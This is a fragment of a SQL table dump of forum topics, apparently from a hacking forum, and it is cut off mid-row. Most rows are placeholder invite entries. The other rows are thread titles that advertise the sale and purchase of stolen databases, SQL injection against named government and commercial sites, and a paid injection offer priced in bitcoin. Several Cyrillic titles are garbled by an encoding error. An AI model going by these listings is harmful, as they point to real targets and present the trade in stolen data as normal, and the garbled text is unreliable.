7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1512, '{$name}', '', 1695, 1695, 1408481017, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408481017, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1513, '{$name}', '', 1696, 1696, 1408483706, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408483706, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1514, '{$name}', '', 1697, 1697, 1408489355, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408489355, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1515, '{$name}', '', 1698, 1698, 1408491481, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408491481, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1530, '{$name}', '', 1714, 1714, 1408519994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519994, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1529, '{$name}', '', 1713, 1713, 1408519987, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519987, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1518, 'принимаю заказы на слив бд', '', 1701, 1701, 1408500220, 7, 0, 1, 0, 0, 0, 'opium', 24, 'opium', 1408500220, 109, 4, '', 1, 1, 0, 0, 0, '', 'ò÷ûþü, ò÷ûþü ýð ÷ðúð÷, ÿðртýõрÑÂтòþ, хõú'), (1528, '{$name}', '', 1712, 1712, 1408519981, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519981, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1527, '{$name}', '', 1711, 1711, 1408519970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519970, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1526, '{$name}', '', 1710, 1710, 1408519960, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519960, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1525, '{$name}', '', 1709, 1709, 1408519942, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519942, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1524, '{$name}', '', 1708, 1708, 1408516070, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408516070, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1531, '{$name}', '', 1715, 1715, 1408520005, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408520005, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1532, '{$name}', '', 1716, 1716, 1408521565, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408521565, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1533, '{$name}', '', 1717, 1717, 1408522520, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408522520, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1534, '{$name}', '', 1718, 1718, 1408523662, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408523662, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1535, '{$name}', '', 1719, 1719, 1408523768, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408523768, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1536, '{$name}', '', 1720, 1720, 1408524427, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408524427, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1537, '{$name}', '', 1721, 1721, 1408531215, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408531215, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1538, 'SQL - Injection HELP', '', 1724, 1724, 1408535071, 7, 0, 1, 0, 0, 0, 'lumbricus', 39, 'lumbricus', 1408535071, 29, 0, '', 1, 0, 0, 0, 0, '', 'advanced sql'), (1539, '{$name}', '', 1725, 1725, 1408537312, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408537312, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1540, 'Buying [Hacking/Carding/Exploit] Related Forum/Site Databases', '', 1726, 1726, 1408547249, 7, 0, 1, 0, 0, 0, 'ropertus', 33, 'ropertus', 1408547249, 164, 0, '', 1, 1, 0, 0, 0, '', NULL), (1541, '{$name}', '', 1727, 1727, 1408553209, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408553209, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1542, '{$name}', '', 1730, 1730, 1408560598, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408560598, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1543, '{$name}', '', 1732, 1732, 1408604486, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408604486, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1544, '{$name}', '', 1733, 1733, 1408604678, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408604678, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1545, '{$name}', '', 1734, 1734, 1408611665, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408611665, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1546, '{$name}', '', 1735, 1735, 1408612146, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408612146, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1547, '{$name}', '', 1736, 1736, 1408613470, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408613470, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1548, '{$name}', '', 1738, 1738, 1408623446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408623446, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1549, '{$name}', '', 1739, 1739, 1408627221, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408627221, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1550, '{$name}', '', 1741, 1741, 1408630707, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408630707, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1551, '{$name}', '', 1742, 1742, 1408633599, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408633599, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1552, '{$name}', '', 1743, 1743, 1408666908, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408666908, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1553, '{$name}', '', 1744, 1744, 1408682381, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408682381, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1554, '{$name}', '', 1748, 1748, 1408701894, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701894, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1555, '{$name}', '', 1749, 1749, 1408701895, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701895, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1556, '{$name}', '', 1750, 1750, 1408701897, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701897, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1557, '{$name}', '', 1751, 1751, 1408709496, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408709496, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1558, '{$name}', '', 1752, 1752, 1408713612, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408713612, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1559, '{$name}', '', 1753, 1753, 1408718412, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408718412, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1572, '{$name}', '', 1777, 1777, 1408901327, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408901327, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1560, 'ßþüþóøтõ ýðùтø чøтðûúу фðùûþò ôûѠblind sqli', '', 1755, 1763, 1408802161, 7, 0, 1, 2, 0, 0, 'Psych0tr1a', 11, 'w0rm', 1408737328, 36, 0, '', 1, 0, 0, 0, 0, '', NULL), (1561, '{$name}', '', 1757, 1757, 1408756163, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408756163, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1562, '{$name}', '', 1759, 1759, 1408772622, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408772622, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1563, '{$name}', '', 1760, 1760, 1408772650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408772650, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1564, '{$name}', '', 1761, 1761, 1408791716, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408791716, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1565, '{$name}', '', 1765, 1765, 1408808934, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408808934, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1566, '{$name}', '', 1766, 1766, 1408811106, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408811106, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1567, '{$name}', '', 1767, 1767, 1408811108, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408811108, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1568, '{$name}', '', 1771, 1771, 1408835460, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408835460, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1569, '{$name}', '', 1772, 1772, 1408843441, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408843441, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1570, '{$name}', '', 1773, 1773, 1408868753, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408868753, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1571, 'Random SQLi Website with Email password count', '', 1774, 1774, 1408885182, 7, 0, 1, 0, 0, 0, 'l3n0', 44, 'l3n0', 1408885182, 43, 0, '', 1, 0, 0, 0, 0, '', NULL), (1573, '{$name}', '', 1779, 1779, 1408903966, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408903966, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1574, '{$name}', '', 1782, 1782, 1408915135, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408915135, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1575, '{$name}', '', 1783, 1783, 1408917789, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408917789, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1576, '{$name}', '', 1784, 1784, 1408955827, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408955827, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1577, 'mystery.bigmir.net', '', 1785, 1790, 1408965405, 7, 0, 1, 1, 0, 0, 'Psych0tr1a', 11, '123', 1408957591, 48, 0, '', 1, 0, 0, 0, 0, '', NULL), (1578, '{$name}', '', 1786, 1786, 1408961591, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408961591, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1579, 'She.com', '', 1787, 1788, 1408963396, 7, 0, 1, 1, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408963261, 41, 0, '', 1, 0, 0, 0, 0, '', NULL), (1580, 'ÃÂüð÷þý (ÿþôôþüõý)', '', 1789, 1795, 1408977683, 7, 0, 1, 3, 0, 0, 'Kingbeef', 3, '123', 1408965280, 45, 0, '', 1, 0, 0, 0, 0, '', NULL), (1581, '{$name}', '', 1792, 1792, 1408968672, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408968672, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1583, '{$name}', '', 1796, 1796, 1408977697, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408977697, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1582, '*.ca.gov Include', '', 1794, 1794, 1408977680, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408977680, 43, 0, '', 1, 0, 0, 0, 0, '', NULL), (1584, '*.sp.gov.br include', '', 1797, 1803, 1408985385, 7, 0, 1, 5, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408978380, 46, 0, '', 1, 0, 0, 0, 0, '', NULL), (1585, '{$name}', '', 1799, 1799, 1408980066, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408980066, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1586, '{$name}', '', 1804, 1804, 1408994451, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408994451, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1587, '{$name}', '', 1805, 1805, 1409010743, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409010743, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1588, '{$name}', '', 1806, 1806, 1409010744, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409010744, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1612, 'overpro.ru | Generic File Downloader', '', 1833, 1910, 1409852899, 7, 0, 1, 20, 0, 1, 'unlog', 45, 'unlog', 1409398034, 345, 0, '', 0, 0, 0, 0, 0, '', NULL), (1589, '{$name}', '', 1808, 1808, 1409059095, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409059095, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1590, '{$name}', '', 1809, 1809, 1409082829, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409082829, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1591, '{$name}', '', 1810, 1810, 1409085977, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409085977, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1592, '{$name}', '', 1811, 1811, 1409150970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409150970, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1593, '{$name}', '', 1812, 1812, 1409153560, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409153560, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1594, '{$name}', '', 1813, 1813, 1409158065, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409158065, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1595, '{$name}', '', 1814, 1814, 1409178713, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409178713, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1596, '{$name}', '', 1815, 1815, 1409178858, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409178858, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1597, '{$name}', '', 1816, 1816, 1409183280, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409183280, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1599, '{$name}', '', 1818, 1818, 1409207204, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409207204, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1600, '{$name}', '', 1819, 1819, 1409210319, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409210319, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1601, '{$name}', '', 1820, 1820, 1409229962, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409229962, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1602, '{$name}', '', 1821, 1821, 1409232838, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409232838, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1603, '{$name}', '', 1822, 1822, 1409246651, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409246651, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1604, '{$name}', '', 1823, 1823, 1409254700, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409254700, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1605, '{$name}', '', 1824, 1824, 1409262943, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409262943, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1606, '{$name}', '', 1825, 1825, 1409266599, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409266599, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1607, '{$name}', '', 1826, 1826, 1409269650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409269650, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1608, '{$name}', '', 1827, 1827, 1409279492, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409279492, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1609, '{$name}', '', 1828, 1828, 1409344961, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409344961, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1610, '{$name}', '', 1829, 1829, 1409359490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409359490, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1611, '{$name}', '', 1830, 1830, 1409386404, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409386404, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1613, '{$name}', '', 1839, 1839, 1409425900, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409425900, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1614, '{$name}', '', 1840, 1840, 1409425953, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409425953, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1615, '{$name}', '', 1841, 1841, 1409428604, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409428604, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1616, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...', '', 1848, 1884, 1409597851, 13, 0, 1, 2, 0, 0, 'Psych0tr1a', 11, 'w0rm', 1409503964, 59, 0, '', 1, 0, 0, 0, 0, '', NULL), (1617, '{$name}', '', 1849, 1849, 1409509093, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409509093, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1628, '{$name}', '', 1885, 1885, 1409604220, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409604220, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1618, '{$name}', '', 1852, 1852, 1409514764, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514764, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1619, '{$name}', '', 1853, 1853, 1409514767, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514767, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1620, '{$name}', '', 1854, 1854, 1409514868, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514868, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1621, '{$name}', '', 1855, 1855, 1409516154, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409516154, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1623, '{$name}', '', 1863, 1863, 1409557547, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409557547, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1630, '{$name}', '', 1889, 1889, 1409631815, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409631815, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1624, 'шõûûы ýð .gov', '', 1867, 1876, 1409585892, 7, 0, 1, 4, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409567924, 51, 0, '', 1, 0, 0, 0, 0, '', NULL), (1625, '{$name}', '', 1874, 1874, 1409585723, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409585723, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1626, '[MySQL]áÿþÑÂþñ þÿрõôõûõýøѠúþûûøчõÑÂтòð òыòþôøüых ÑÂтþñцþò ò 1 ÷ðÿрþÑÂ.', '', 1877, 1890, 1409666498, 7, 0, 0, 2, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409586490, 35, 0, '', 2, 0, 0, 0, 0, '', NULL), (1729, '{$name}', '', 2082, 2082, 1411012004, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411012004, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1629, '{$name}', '', 1886, 1886, 1409606276, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409606276, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1638, 'sql inj kontakten.dn.se', '', 1901, 1903, 1409760496, 7, 0, 1, 2, 0, 0, 'null', 9, 'null', 1409747318, 38, 0, '', 1, 0, 0, 0, 0, '', NULL), (1631, '{$name}', '', 1892, 1892, 1409680304, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680304, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1632, '{$name}', '', 1893, 1893, 1409680306, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680306, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1633, '{$name}', '', 1894, 1894, 1409680311, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680311, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1634, '{$name}', '', 1895, 1895, 1409684278, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409684278, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1635, '{$name}', '', 1896, 1896, 1409693476, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409693476, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1636, '{$name}', '', 1897, 1897, 1409711516, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409711516, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1639, 'SQLi www.goccp.maryland.gov', '', 1905, 1905, 1409781988, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409781988, 44, 0, '', 1, 0, 0, 0, 0, '', NULL), (1640, '{$name}', '', 1906, 1906, 1409785756, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409785756, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1641, '{$name}', '', 1907, 1907, 1409790949, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409790949, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1642, '{$name}', '', 1908, 1908, 1409816056, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409816056, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1643, '{$name}', '', 1909, 1909, 1409833231, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409833231, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1644, '{$name}', '', 1911, 1911, 1409865048, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409865048, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1645, 'ghanaweb.com', '', 1912, 1937, 1410009498, 7, 0, 1, 5, 0, 0, 'kx00', 6, '123', 1409909840, 93, 0, '', 1, 0, 0, 0, 0, '', NULL), (1646, '{$name}', '', 1916, 1916, 1409932765, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409932765, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1647, '{$name}', '', 1917, 1917, 1409932784, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409932784, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1648, 'Linksys Smart Wi-Fi Router EA6500', '', 1919, 2210, 1411933014, 9, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1409938637, 134, 0, '', 1, 0, 0, 0, 0, '', NULL), (1649, '{$name}', '', 1920, 1920, 1409939218, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409939218, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1651, '{$name}', '', 1925, 1925, 1409940382, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409940382, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1653, '{$name}', '', 1933, 1933, 1409954202, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409954202, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1654, '{$name}', '', 1934, 1934, 1409955345, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409955345, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1655, '{$name}', '', 1936, 1936, 1410007333, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410007333, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1656, '{$name}', '', 1938, 1938, 1410010209, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410010209, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1658, '*.apple.', '', 1942, 1965, 1410234541, 7, 0, 1, 3, 0, 0, 'w0rm', 1, 'null', 1410023769, 127, 0, '', 1, 0, 0, 0, 0, '', NULL), (1659, '{$name}', '', 1943, 1943, 1410025941, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410025941, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1660, '{$name}', '', 1944, 1944, 1410029704, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410029704, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1661, '{$name}', '', 1945, 1945, 1410036730, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410036730, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1818, '{$name}', '', 2212, 2212, 1411945374, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411945374, 32, 0, '', 1, 0, 0, 0, 0, '', NULL), (1662, '{$name}', '', 1948, 1948, 1410055038, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410055038, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1663, '{$name}', '', 1950, 1950, 1410060418, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410060418, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1664, '{$name}', '', 1951, 1951, 1410077195, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410077195, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1665, '{$name}', '', 1952, 1952, 1410099913, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410099913, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1666, 'MVC -SQLi - 3 BTC', '', 1953, 1960, 1410209742, 7, 0, 1, 2, 0, 0, 'lumbricus', 39, 'ropertus', 1410165986, 67, 0, '', 1, 0, 0, 0, 0, '', 'advanced sqli'), (1667, '{$name}', '', 1957, 1957, 1410185271, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410185271, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1668, '{$name}', '', 1959, 1959, 1410205047, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410205047, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1669, '{$name}', '', 1961, 1961, 1410209872, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410209872, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1670, '{$name}', '', 1962, 1962, 1410217869, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410217869, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1671, 'Sql velocityfrequentflyer.com', '', 1963, 1963, 1410233668, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410233668, 30, 0, '', 1, 0, 0, 0, 0, '', NULL), (1672, 'enterprise-news.alcatel-lucent.com', '', 1964, 1964, 1410233808, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410233808, 41, 0, '', 1, 0, 0, 0, 0, '', NULL), (1673, '{$name}', '', 1966, 1966, 1410246132, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410246132, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1675, '{$name}', '', 1968, 1968, 1410281798, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410281798, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1677, '{$name}', '', 1972, 1972, 1410343238, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410343238, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1678, '{$name}', '', 1973, 1973, 1410352098, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410352098, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1679, '{$name}', '', 1974, 1974, 1410358171, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410358171, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1681, '{$name}', '', 1979, 1979, 1410383376, 2, 